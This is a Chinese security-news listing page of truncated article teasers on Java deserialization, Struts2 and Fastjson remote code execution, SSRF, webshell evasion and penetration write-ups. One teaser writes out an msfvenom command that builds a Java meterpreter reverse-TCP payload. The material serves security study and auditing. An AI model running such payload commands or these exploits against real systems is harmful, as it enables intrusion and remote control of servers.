inputstream - 第 4 | CN-SEC 中文网

代码审计

【代码扫描修复】不安全的反序列化攻击

PART.01一、漏洞描述 1.1 摘要：在运行时对用户控制的对象流进行反序列化，会让攻击者有机会在服务器上执行任意代码、滥用应用程序逻辑和/或导致 Denial of Service。 1.2 漏...

12月21日110 views评论

阅读全文

安全文章

简单免杀webshell拿下目标站点

在某次对目标单位进行攻防演练的时候，搜集资产发现该单位有个用友nc，并且存在rce，于是就用脚本直接梭哈。运行脚本后回显webshell地址（没截图），用冰蝎连接发现没了，怀疑是webshell被落地...

12月15日52 views评论

阅读全文

代码审计

S2-013远程代码执行漏洞

漏洞简介Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性，其值可设置为 none，g...

12月10日61 views评论

阅读全文

安全新闻

Java 反序列化漏洞仍然存在

几个月前，Contrast 安全团队向 VMWare 安全团队报告了有关 Spring Kafka 的 Java 反序列化漏洞。它立即引起了我的注意，我开始分析这个错误。如果您有兴趣，可以查看我之前的...

10月26日24 views评论

阅读全文

代码审计

【Java代码审计】命令执行漏洞审计

1. 漏洞原理因用户输入未过滤或净化不完全，导致Web应用程序接收用户输入，拼接到要执行的系统命令中执行。一旦攻击者可以在目标服务器中执行任意系统命令，就意味着服务器已被非法控制。2. 审计中常用函数...

09月26日97 views评论

阅读全文

安全文章

Meterpreter源码分析

一、生成木马上线msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.245.129 LPORT=4444 > /home/rkabyss...

09月24日73 views评论

阅读全文

HW&HVV

HW40个高危漏洞利用

来源： YNsec YNsec安全实验室 1、Apache Log4j2 远程代码执行漏洞 Apache Log4j2 是一个开源的 Java 日志框架，被广泛地应用在中间件、开发框架与 Web 应用...

08月09日239 views评论

阅读全文

CTF专场

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

2023 Aliyun CTF ezbean 是一道 CTF java 反序列化题目。题目的目的是让选手通过一个 java 原生反序列化入口，最终达成 RCE。本文对题目的几种解法做了具体的分析，主要...

06月19日80 views评论

阅读全文

代码审计

FastJson结合二次反序列化绕过黑名单

本文转自先知社区：https://xz.aliyun.com/t/12606作者：Squirt1e省流该利用链可以在fastjson多个版本实现RCE，并且借助SignedObject绕过第一层安全的...

06月15日59 views评论

阅读全文

代码审计

java代码审计-ssrf漏洞

0x00 前言SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定 URL 地址获取网页文本内容，加载指定地址的图片，下载等等。这里主要介绍...

04月26日40 views评论

阅读全文

代码审计

反序列化漏洞的防御与拒绝服务

哆啦安全，赞 7 最近两个月我一直在做拒绝服务漏洞相关的时间，并收获了Spring和Weblogic的两个CVE（还有一些报告也许正在审核和修复中）但DoS漏洞终归是鸡肋洞，并没有太大的意义，比如之...

03月18日35 views已关闭评论

阅读全文

安全文章

记一次不完美的Jboss渗透实战

声明：该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与...

03月11日28 views评论

阅读全文

【代码扫描修复】不安全的反序列化攻击

简单免杀webshell拿下目标站点

S2-013远程代码执行漏洞

Java 反序列化漏洞仍然存在

【Java代码审计】命令执行漏洞审计

Meterpreter源码分析

HW40个高危漏洞利用

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

FastJson结合二次反序列化绕过黑名单

java代码审计-ssrf漏洞

反序列化漏洞的防御与拒绝服务

记一次不完美的Jboss渗透实战

在线咨询

微信